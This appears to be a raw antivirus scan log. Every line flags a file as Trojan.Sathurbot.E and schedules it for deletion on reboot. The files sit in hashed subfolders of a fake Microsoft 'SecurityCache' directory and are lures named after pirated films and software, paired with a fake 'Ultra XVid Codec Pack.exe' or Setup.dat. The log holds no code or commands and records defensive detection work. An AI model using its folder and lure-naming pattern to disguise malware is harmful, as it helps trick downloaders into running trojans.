Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\965c44f802aeda450496a2811908ddbb\Mat Moto Otai 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\965c44f802aeda450496a2811908ddbb\Mat Moto Otai 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\965c44f802aeda450496a2811908ddbb\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\98aa80db2acbfe37a9f978c6b6c0920a\Morgan 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\98aa80db2acbfe37a9f978c6b6c0920a\Morgan 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\98aa80db2acbfe37a9f978c6b6c0920a\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9a1ed8766c859a2a21ff3cba26f0b166\Lion 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9a1ed8766c859a2a21ff3cba26f0b166\Lion 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9a1ed8766c859a2a21ff3cba26f0b166\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9bba2f1e69982976340996427e7778a0\Marauders 2016 720p.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9bba2f1e69982976340996427e7778a0\Marauders 2016 720p.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9bba2f1e69982976340996427e7778a0\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9eb5b6e6ae69e3bc13cc76f94dd6fded\Red Giant Trapcode Suite 13.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9eb5b6e6ae69e3bc13cc76f94dd6fded\Red Giant Trapcode Suite 13.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\9eb5b6e6ae69e3bc13cc76f94dd6fded\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a1950e3528b0871ee6f1e0891096f785\DxO OpticsPro 11.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a1950e3528b0871ee6f1e0891096f785\DxO OpticsPro 11.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a1950e3528b0871ee6f1e0891096f785\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a544aaf5c59dbfc473ac2e3ad7274d53\Suicide Squad 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a544aaf5c59dbfc473ac2e3ad7274d53\Suicide Squad 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a544aaf5c59dbfc473ac2e3ad7274d53\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a5825cb12a9a21ab824c133c72022a90\Adobe Photoshop Lightroom CC 6.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a5825cb12a9a21ab824c133c72022a90\Adobe Photoshop Lightroom CC 6.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\a5825cb12a9a21ab824c133c72022a90\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\183fb8947af66b4e00cfe938ccb4b40c\Microsoft Office Professional Plus x64.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\183fb8947af66b4e00cfe938ccb4b40c\Microsoft Office Professional Plus x64.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\183fb8947af66b4e00cfe938ccb4b40c\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\18927ccfded0d0bce2c25484315d2550\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\18927ccfded0d0bce2c25484315d2550\The Sims 4.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\18927ccfded0d0bce2c25484315d2550\The Sims 4.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1bf8ddd876682be4149bc49e2386fa37\S Storm 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1bf8ddd876682be4149bc49e2386fa37\S Storm 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1bf8ddd876682be4149bc49e2386fa37\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1ca0d14fa7448c8f80cd2be26548ab3d\Wondershare MobileGo 8.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1ca0d14fa7448c8f80cd2be26548ab3d\Wondershare MobileGo 8.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1d3257c5e4c8f8afa1263428ef788e06\Long Long Time Ago 2.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1d3257c5e4c8f8afa1263428ef788e06\Long Long Time Ago 2.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1d3257c5e4c8f8afa1263428ef788e06\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1e96dc0081d605db4607f655335d70f8\Star Trek Beyond 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1e96dc0081d605db4607f655335d70f8\Star Trek Beyond 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1e96dc0081d605db4607f655335d70f8\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1f11c252718b0dceea8f4e6def7fbe79\Blood Father 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1f11c252718b0dceea8f4e6def7fbe79\Blood Father 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\1f11c252718b0dceea8f4e6def7fbe79\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\20cf9543585b13f565de6ba5ba81b1fa\Colonia 2015.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\20cf9543585b13f565de6ba5ba81b1fa\Colonia 2015.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\20cf9543585b13f565de6ba5ba81b1fa\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c1e5440a8ad280d66ce37cd683132035\One Night Only 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c1e5440a8ad280d66ce37cd683132035\One Night Only 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c1e5440a8ad280d66ce37cd683132035\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c2515841ede50ad5241889b3a5239af1\Intuit QuickBooks Enterprise Solutions 2016.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c2515841ede50ad5241889b3a5239af1\Intuit QuickBooks Enterprise Solutions 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c2515841ede50ad5241889b3a5239af1\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c2ca803de5ea15aebc24dfb31e46ff88\Pro Evolution Soccer 2015.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c2ca803de5ea15aebc24dfb31e46ff88\Pro Evolution Soccer 2015.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c2ca803de5ea15aebc24dfb31e46ff88\Setup1.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c2ca803de5ea15aebc24dfb31e46ff88\Setup2.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3334816313242fc3a4fcc7650a14d9d\Adobe Acrobat XI Pro 11.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3334816313242fc3a4fcc7650a14d9d\Adobe Acrobat XI Pro 11.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3334816313242fc3a4fcc7650a14d9d\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c35c62bbfd5815621772ca046abafe5e\Rings 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c35c62bbfd5815621772ca046abafe5e\Rings 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c35c62bbfd5815621772ca046abafe5e\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3b439f57d05edb948574b50b8fa59fb\Cell 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3b439f57d05edb948574b50b8fa59fb\Cell 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3b439f57d05edb948574b50b8fa59fb\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3b69c6a946666dd8ca776ad800ff836\Supergirl [SE02].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3b69c6a946666dd8ca776ad800ff836\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c3b69c6a946666dd8ca776ad800ff836\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4fcb2f1b6686cd04f82bcf02314f6ae\The Circle 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4fcb2f1b6686cd04f82bcf02314f6ae\The Circle 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\c4fcb2f1b6686cd04f82bcf02314f6ae\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dee4e623d06c82f12da1b32d739e055\Snagit 12.4.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7dee4e623d06c82f12da1b32d739e055\Snagit 12.4.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7e8f4bb2dce979fd6160cd928709b045\20th Century Women.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7e8f4bb2dce979fd6160cd928709b045\20th Century Women.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7e8f4bb2dce979fd6160cd928709b045\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7f57ffcf705c68eb438cc6f35c7cc0a6\Microsoft OFFICE 2010.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7f57ffcf705c68eb438cc6f35c7cc0a6\Microsoft OFFICE 2010.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7f57ffcf705c68eb438cc6f35c7cc0a6\Setup.dat, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7f8f40c8cecb5de0ae30e927174121d3\Me Before You 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7f8f40c8cecb5de0ae30e927174121d3\Me Before You 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\7f8f40c8cecb5de0ae30e927174121d3\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\80314d336e5581f4825c25bafd0b2f67\The Devils Dolls 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\80314d336e5581f4825c25bafd0b2f67\The Devils Dolls 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\80314d336e5581f4825c25bafd0b2f67\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8071b2e0bda3117347f54c0380caa9be\Swiss Army Man 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8071b2e0bda3117347f54c0380caa9be\Swiss Army Man 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8071b2e0bda3117347f54c0380caa9be\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\82f6e91ee379a279953b0f5cc542f6b0\Star Wars Rogue One 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\82f6e91ee379a279953b0f5cc542f6b0\Star Wars Rogue One 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\82f6e91ee379a279953b0f5cc542f6b0\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\830a7e836dc5f626f298ba8f5f4ef5ab\Hillarys America The Secret History.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\830a7e836dc5f626f298ba8f5f4ef5ab\Hillarys America The Secret History.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\830a7e836dc5f626f298ba8f5f4ef5ab\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\83ae0e7e209219becd1e7bb3057b4a11\Sword Art Online Ordinal Scale 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\83ae0e7e209219becd1e7bb3057b4a11\Sword Art Online Ordinal Scale 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\83ae0e7e209219becd1e7bb3057b4a11\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8518a46f9fcad1ca962b282ae0145c40\WorldUnlock Codes Calculator.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\8518a46f9fcad1ca962b282ae0145c40\WorldUnlock Codes Calculator.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2abc6f3e0a5236dc6f62668ff5bc4e33\Beatles Eight Days A Week 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2abc6f3e0a5236dc6f62668ff5bc4e33\Beatles Eight Days A Week 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2abc6f3e0a5236dc6f62668ff5bc4e33\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2af68deceeb5865b945c578b9ee63cc4\Office Christmas Party 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2af68deceeb5865b945c578b9ee63cc4\Office Christmas Party 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2af68deceeb5865b945c578b9ee63cc4\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2c7c602718049c67e933ffa40e5da42e\Three 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2c7c602718049c67e933ffa40e5da42e\Three 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2c7c602718049c67e933ffa40e5da42e\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2f1e4664911cc42c367ca2875ddb2ff9\Lulu The Movie 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2f1e4664911cc42c367ca2875ddb2ff9\Lulu The Movie 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\2f1e4664911cc42c367ca2875ddb2ff9\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\330e3d5b4ae8d0b769873c425c01c913\Doraemon The Movie Nobita.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\330e3d5b4ae8d0b769873c425c01c913\Doraemon The Movie Nobita.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\330e3d5b4ae8d0b769873c425c01c913\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3367a180a64bb4b31da2d6965f49c613\Pure Genius [SE01].txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3367a180a64bb4b31da2d6965f49c613\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\3367a180a64bb4b31da2d6965f49c613\Video.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\345dbb1e10eb304f47c293bbd8b06e5d\Table 19 2017.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\345dbb1e10eb304f47c293bbd8b06e5d\Table 19 2017.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\345dbb1e10eb304f47c293bbd8b06e5d\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\350faf47d3ddd37a10d22bd00961ec33\The Bronze 2015.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\350faf47d3ddd37a10d22bd00961ec33\The Bronze 2015.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\350faf47d3ddd37a10d22bd00961ec33\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\389bded36d89adf971ebc258373fa5cf\Nocturnal Animals 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\389bded36d89adf971ebc258373fa5cf\Nocturnal Animals 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\389bded36d89adf971ebc258373fa5cf\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\46f944387ed36384118d8623f6e1531b\Nerve 2016 TSHQ.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\46f944387ed36384118d8623f6e1531b\Nerve 2016 TSHQ.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\46f944387ed36384118d8623f6e1531b\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\483c4d526d59228c7d0d68d085fbe81a\Motley Crue The End 2016.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\483c4d526d59228c7d0d68d085fbe81a\Motley Crue The End 2016.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\483c4d526d59228c7d0d68d085fbe81a\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\492f2347112f091a4eb2e43788498cad\Jolly LLB 2.avi, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\492f2347112f091a4eb2e43788498cad\Jolly LLB 2.txt, Delete-on-Reboot, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\data\492f2347112f091a4eb2e43788498cad\Ultra XVid Codec Pack.exe, Delete-on-Reboot, [2851], [355073],1.0.1064
